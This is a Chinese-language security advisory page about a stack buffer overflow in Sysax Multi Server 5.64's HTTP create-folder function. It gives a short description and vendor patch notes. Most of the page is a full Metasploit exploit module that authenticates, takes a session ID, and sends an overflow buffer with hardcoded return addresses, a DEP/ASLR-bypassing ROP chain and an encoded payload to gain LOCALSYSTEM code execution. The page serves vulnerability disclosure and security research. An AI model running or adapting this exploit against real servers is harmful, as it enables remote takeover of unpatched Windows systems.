Sysax Multi Server函数缓冲区溢出漏洞
Sysax Multi Server函数缓冲区溢出漏洞
发布日期:2012-07-29
更新日期:2012-07-31
受影响系统:
sysax Sysax Multi Server 5.64
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54713
Sysax Multi Server是windows平台下的SSH2和FTP服务器。
Sysax Multi Server 5.64及之前版本在实现上存在缓冲区溢出漏洞,攻击者可利用此漏洞以提升的权限执行任意代码。
<*来源:Matt Andreko
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Matt Andreko ()提供了如下测试方法:
require 'msf/core'
require 'base64'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Sysax Multi Server 5.64 Create Folder BoF',
'Description' => %q{
This module exploits a stack buffer overflow in the create folder function
in Sysax Multi Server 5.64. This issue was fixed in 5.66.
You must have valid credentials to trigger the vulnerability. Your credentials
must also have the create folder permission and the HTTP option has to be enabled.
This module will log into the server, get your a SID token and then proceed to exploit
the server. Successful exploits result in LOCALSYSTEM access. This exploit works on
XP SP3, and Server 2003 SP1-SP2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Matt Andreko @mandreko', # discovery & Metasploit module for 5.64
'Craig Freyman @cd1zz', # original discovery & Metasploit module for 5.50
],
'Version' => '$Revision:$',
'References' =>
[
[ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], # 5.64 update
[ 'URL', 'http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html' ], # 5.50 post
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x2F",
},
'Targets' =>
[
[ 'Windows XP SP3',
{
'Rop' => false,
'Ret' => 0x77c35459, # push esp # ret [sysaxd.exe]
'Offset' => 701,
}
],
[ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass',
{
'Rop' => true,
'Ret' => 0x77baf605, # pivot
'Offset' => 701,
'Nop' => 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll]
}
],
],
'Privileged' => false,
'DisclosureDate'=> 'July 29, 2012',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [false, "URI for Multi Server", '/']),
Opt::RPORT(80),
OptString.new('SysaxUSER', [ true, "Username" ]),
OptString.new('SysaxPASS', [ true, "Password" ])
], self.class)
end
def target_url
"http://#{rhost}:#{rport}#{datastore['URI']}"
end
def create_rop_chain()
rop_gadgets = []
# All rop gadgets generated by mona.py
# Thanks corelanc0d3r for making such a great tool
if (target == targets[1]) # Windows 2003
rop_gadgets =
[
0x77be3adb, # POP EAX # RETN [msvcrt.dll]
0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll]
0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll]
0x41414141, # Filler (compensate)
0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll]
0x77bdb896, # POP EBP # RETN [msvcrt.dll]
0x77be2265, # & push esp # ret [msvcrt.dll]
0x77bdeebf, # POP EAX # RETN [msvcrt.dll]
0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx)
0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll]
0x77bdf0da, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx)
0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77bcc2ee, # POP ECX # RETN [msvcrt.dll]
0x77befbb4, # &Writable location [msvcrt.dll]
0x77bbf75e, # POP EDI # RETN [msvcrt.dll]
0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll]
0x77bdf0da, # POP EAX # RETN [msvcrt.dll]
0x90909090, # nop
0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
].flatten.pack("V*")
end
return rop_gadgets
end
def exploit
user = datastore['SysaxUSER']
pass = datastore['SysaxPASS']
#base64 encode the credentials
encodedcreds = Base64.encode64(user+"\x0a"+pass)
creds = "fd="+encodedcreds
connect
# Login to get SID value
print_status "Getting SID from #{target_url}"
res = send_request_raw({
'method'=> 'POST',
'uri' => "#{target_url}/scgi?sid=0&pid=dologin",
'data' => creds
},20)
#parse response for SID token
sid = res.body.match (/(sid=[A-Z0-9a-z]{40})/)
print_status "Your " + sid.to_s
buffer = rand_text(target['Offset'])
buffer << [target.ret].pack('V')
if (target['Rop'])
buffer << [target['Nop']].pack('V')*16
buffer << create_rop_chain()
end
buffer << make_nops(15)
buffer << payload.encoded #max 1299 bytes
#pwnag3 post data
post_data = "scgi?"+sid.to_s+"&pid=mk_folder2_name1.htm HTTP/1.1\r\n"
post_data << "Content-Length: 171\r\n\r\n"
post_data << "-----------------------------1190753071675116720811342231\r\n"
post_data << "Content-Disposition: form-data; name=\"e2\"\r\n\r\n"
post_data << buffer+"\r\n"
post_data << "-----------------------------1190753071675116720811342231--\r\n\r\n"
referer = "http://"+datastore['RHOST'].to_s+"/scgi?"+sid.to_s+"&pid=mk_folder1_name1.htm"
send_request_raw({
'uri' => "/" + post_data,
'version' => '1.1',
'method' => 'POST',
'referer' => referer
})
handler
disconnect
end
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
sysax
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.sysax.com/
评论暂时关闭